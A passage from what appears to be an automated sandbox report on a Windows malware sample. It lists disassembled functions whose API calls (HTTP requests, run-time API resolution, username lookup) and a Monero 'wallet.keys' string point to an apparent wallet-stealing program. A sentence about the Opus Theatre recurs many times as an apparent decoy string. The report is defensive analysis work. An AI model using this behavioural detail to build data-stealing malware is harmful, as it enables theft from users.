                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: e0e919c0a181e3e4761569682b6ef3db093da5a8f22fe90550f4713ada199f9e
                          • Instruction ID: 22ed7a58571918d810edc57e10ddec68df788e9c23d2e020e164f13485651267
                          • Opcode Fuzzy Hash: e0e919c0a181e3e4761569682b6ef3db093da5a8f22fe90550f4713ada199f9e
                          • Instruction Fuzzy Hash: 534109607C5A1C7AC634B7A4A8CEFBF76775F4A700FA25046E80852292CBF865144D3B
                          Function 00404880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 816 404944 801->816 817 40494b-40494f 801->817 816->817 818 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 817->818 819 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 817->819 818->819 905 404ad3-404ad7 818->905 829 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 819->829 830 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 819->830 830->829 906 404ae5 905->906 907 404ad9-404ae3 905->907 908 404aef-404b22 HttpOpenRequestA 906->908 907->908 909 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlen call 41aad0 * 2 lstrlen call 41aad0 HttpSendRequestA 908->909 910 404ebe-404ec5 InternetCloseHandle 908->910 1021 404e32-404e5c InternetReadFile 909->1021 910->819 1022 404e67-404eb9 InternetCloseHandle call 41a800 1021->1022 1023 404e5e-404e65 1021->1023 1022->910 1023->1022 1025 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 1023->1025 1025->1021
                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                          • StrCmpCA.SHLWAPI(?,0128E5E0), ref: 0040493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0128E530), ref: 00404DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                          • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                          • HttpOpenRequestA.WININET(00000000,0128E5C0,?,0128DBB0,00000000,00000000,00400100,00000000), ref: 00404B15
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: a77be31ba9bf1b8b80f4c82e090011943913d2fdc8a5aa566b93f09babfa9efe
                          • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                          • Opcode Fuzzy Hash: a77be31ba9bf1b8b80f4c82e090011943913d2fdc8a5aa566b93f09babfa9efe
                          • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                          Function 00417850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00417887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                          • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                          • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                          • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                          Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                          • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                          • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                          • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6
                          Function 00419C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(75900000,01276920), ref: 00419C2D
                          • GetProcAddress.KERNEL32(75900000,01276A20), ref: 00419C45
                          • GetProcAddress.KERNEL32(75900000,01288F70), ref: 00419C5E
                          • GetProcAddress.KERNEL32(75900000,01288F58), ref: 00419C76
                          • GetProcAddress.KERNEL32(75900000,0128CF18), ref: 00419C8E
                          • GetProcAddress.KERNEL32(75900000,0128CF90), ref: 00419CA7
                          • GetProcAddress.KERNEL32(75900000,0127AF28), ref: 00419CBF
                          • GetProcAddress.KERNEL32(75900000,0128CE28), ref: 00419CD7
                          • GetProcAddress.KERNEL32(75900000,0128CF30), ref: 00419CF0
                          • GetProcAddress.KERNEL32(75900000,0128CE40), ref: 00419D08
                          • GetProcAddress.KERNEL32(75900000,0128CF48), ref: 00419D20
                          • GetProcAddress.KERNEL32(75900000,012766A0), ref: 00419D39
                          • GetProcAddress.KERNEL32(75900000,01276780), ref: 00419D51
                          • GetProcAddress.KERNEL32(75900000,01276800), ref: 00419D69
                          • GetProcAddress.KERNEL32(75900000,01276820), ref: 00419D82
                          • GetProcAddress.KERNEL32(75900000,0128CED0), ref: 00419D9A
                          • GetProcAddress.KERNEL32(75900000,0128CFA8), ref: 00419DB2
                          • GetProcAddress.KERNEL32(75900000,0127AED8), ref: 00419DCB
                          • GetProcAddress.KERNEL32(75900000,012769A0), ref: 00419DE3
                          • GetProcAddress.KERNEL32(75900000,0128CF60), ref: 00419DFB
                          • GetProcAddress.KERNEL32(75900000,0128CEB8), ref: 00419E14
                          • GetProcAddress.KERNEL32(75900000,0128CE88), ref: 00419E2C
                          • GetProcAddress.KERNEL32(75900000,0128CF78), ref: 00419E44
                          • GetProcAddress.KERNEL32(75900000,01276940), ref: 00419E5D
                          • GetProcAddress.KERNEL32(75900000,0128CFC0), ref: 00419E75
                          • GetProcAddress.KERNEL32(75900000,0128CE58), ref: 00419E8D
                          • GetProcAddress.KERNEL32(75900000,0128CE10), ref: 00419EA6
                          • GetProcAddress.KERNEL32(75900000,0128CE70), ref: 00419EBE
                          • GetProcAddress.KERNEL32(75900000,0128CEA0), ref: 00419ED6
                          • GetProcAddress.KERNEL32(75900000,0128CEE8), ref: 00419EEF
                          • GetProcAddress.KERNEL32(75900000,0128CF00), ref: 00419F07
                          • GetProcAddress.KERNEL32(75900000,0128C8E8), ref: 00419F1F
                          • GetProcAddress.KERNEL32(75900000,0128C810), ref: 00419F38
                          • GetProcAddress.KERNEL32(75900000,01289DB8), ref: 00419F50
                          • GetProcAddress.KERNEL32(75900000,0128C888), ref: 00419F68
                          • GetProcAddress.KERNEL32(75900000,0128C870), ref: 00419F81
                          • GetProcAddress.KERNEL32(75900000,01276960), ref: 00419F99
                          • GetProcAddress.KERNEL32(75900000,0128C960), ref: 00419FB1
                          • GetProcAddress.KERNEL32(75900000,01276880), ref: 00419FCA
                          • GetProcAddress.KERNEL32(75900000,0128C978), ref: 00419FE2
                          • GetProcAddress.KERNEL32(75900000,0128C990), ref: 00419FFA
                          • GetProcAddress.KERNEL32(75900000,01276600), ref: 0041A013
                          • GetProcAddress.KERNEL32(75900000,01276480), ref: 0041A02B
                          • LoadLibraryA.KERNEL32(0128C840,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A03D
                          • LoadLibraryA.KERNEL32(0128CA08,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A04E
                          • LoadLibraryA.KERNEL32(0128CAB0,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A060
                          • LoadLibraryA.KERNEL32(0128CAC8,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A072
                          • LoadLibraryA.KERNEL32(0128C9A8,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A083
                          • LoadLibraryA.KERNEL32(0128C9C0,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A095
                          • LoadLibraryA.KERNEL32(0128CAE0,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A0A7
                          • LoadLibraryA.KERNEL32(0128C858,?,00415CA3,00420AEB,?,?,?,?,?,?,?,?,?,?,00420AEA,00420AE3), ref: 0041A0B8
                          • GetProcAddress.KERNEL32(75FD0000,01276280), ref: 0041A0DA
                          • GetProcAddress.KERNEL32(75FD0000,0128C9D8), ref: 0041A0F2
                          • GetProcAddress.KERNEL32(75FD0000,01288970), ref: 0041A10A
                          • GetProcAddress.KERNEL32(75FD0000,0128C8A0), ref: 0041A123
                          • GetProcAddress.KERNEL32(75FD0000,012764E0), ref: 0041A13B
                          • GetProcAddress.KERNEL32(6FCE0000,0127AF78), ref: 0041A160
                          • GetProcAddress.KERNEL32(6FCE0000,01276380), ref: 0041A179
                          • GetProcAddress.KERNEL32(6FCE0000,0127B338), ref: 0041A191
                          • GetProcAddress.KERNEL32(6FCE0000,0128C8D0), ref: 0041A1A9
                          • GetProcAddress.KERNEL32(6FCE0000,0128C918), ref: 0041A1C2
                          • GetProcAddress.KERNEL32(6FCE0000,012763C0), ref: 0041A1DA
                          • GetProcAddress.KERNEL32(6FCE0000,012762A0), ref: 0041A1F2
                          • GetProcAddress.KERNEL32(6FCE0000,0128C8B8), ref: 0041A20B
                          • GetProcAddress.KERNEL32(763B0000,012763A0), ref: 0041A22C
                          • GetProcAddress.KERNEL32(763B0000,012762E0), ref: 0041A244
                          • GetProcAddress.KERNEL32(763B0000,0128C900), ref: 0041A25D
                          • GetProcAddress.KERNEL32(763B0000,0128C930), ref: 0041A275
                          • GetProcAddress.KERNEL32(763B0000,012764A0), ref: 0041A28D
                          • GetProcAddress.KERNEL32(750F0000,0127AFA0), ref: 0041A2B3
